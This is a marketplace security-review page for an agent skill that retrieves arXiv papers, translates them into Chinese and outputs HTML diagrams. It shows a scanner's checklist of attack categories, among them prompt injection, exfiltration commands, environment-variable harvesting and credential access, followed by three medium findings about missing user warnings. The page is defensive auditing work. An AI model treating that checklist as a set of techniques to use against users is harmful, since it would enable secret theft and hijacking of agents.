ClawHub

arxiv文献解读,将提供arxiv链接,将文献翻译为中文解读,并给出对应的流程图

Security checks across malware telemetry and agentic risk

Overview

This skill coherently retrieves arXiv paper information, translates it into Chinese, and creates diagram outputs without hidden persistence or unrelated authority.

Install this if you are comfortable with the agent sending arXiv IDs, paper titles, or related search queries to external retrieval services and producing local HTML diagram files. Review generated HTML before sharing or opening it in sensitive contexts, and avoid using private or embargoed research material unless you accept those external lookups.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill explicitly performs external network access, web scraping, and search-based retrieval, but the user-facing description does not warn that their query or requested paper identifiers may be sent to third-party services. This creates a transparency and consent problem and can expose user activity, internal prompts, or sensitive research interests to external domains without clear opt-in.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The skill states that it outputs an HTML file but does not warn users that generated HTML is an active content format that may contain embedded scripts, external references, or unsafe rendering behavior depending on the renderer and viewing environment. Delivering HTML without disclosure increases the risk that users open untrusted output locally or in a browser context without appropriate caution.

Natural-Language Policy Violations

Medium
Confidence
84% confidence
Finding
Forcing Chinese translation/output without user choice is primarily a product safety and usability issue: it can cause unintended disclosure through translation, degrade fidelity for technical review, and override user expectations about output handling. In security-sensitive or compliance-sensitive contexts, automatic translation may also alter meaning or propagate data to additional processing steps without explicit consent.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal